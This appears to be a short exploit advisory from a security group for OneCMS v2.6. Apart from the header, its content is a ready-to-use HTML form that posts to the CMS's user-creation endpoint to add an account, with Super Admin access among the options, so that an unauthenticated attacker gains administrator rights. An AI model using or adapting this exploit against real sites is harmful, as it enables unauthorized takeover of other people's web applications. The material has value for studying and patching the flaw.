( #Topic    : OneCMS_v2.6 2010-03-25
( #Bug type : remote add admin user exploit
( #Download : http://sourceforge.net/projects/onecms/files/onecms/v2.6/OneCMS_v2.6.zip/download

===========================================================================
( #Author : ItSecTeam
( #Email  : Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #Original Advisory : www.ITSecTeam.com/en/vulnerabilities/vulnerability29.htm
( #coded by ahmadbady
( #Special Tnx : PLATEN , 0xd41684c654 , b3hz4d , Pejvak , Cdef3nder , mijax , r3dm0v3 , M3hr@n.S And All Team Members!

   
---------------------------------------------------------------------
exploit:

<html>
<head>
<body>
<form action='users.php?load=users&view=add2' method='post'>
<table cellspacing="0" cellpadding="3" border="0" align="left">
<tr><td>Username</td><td><input type="text" name='name'></td></tr>
<tr><td>Password</td><td><input type="password" name='password1'></td>
</tr><tr><td>E-Mail</td><td><input type="text" name='email'></td></tr><tr>
<td>User Level</td><td><select name='level' multiple size='5'>
<option value="Super Admin">Super Admin</option>
<option value="Member">Member</option>
<option value="Super Staff">Super Staff</option>
<option value="Staff">Staff</option>
<input type="submit" name="Add" value="Add User"></td></tr></form></table></td>
</tr></table><tr><td width="100%" height="9"></td><tr><tr><td/>
</body>
</html>
---------------------------------------------------------------------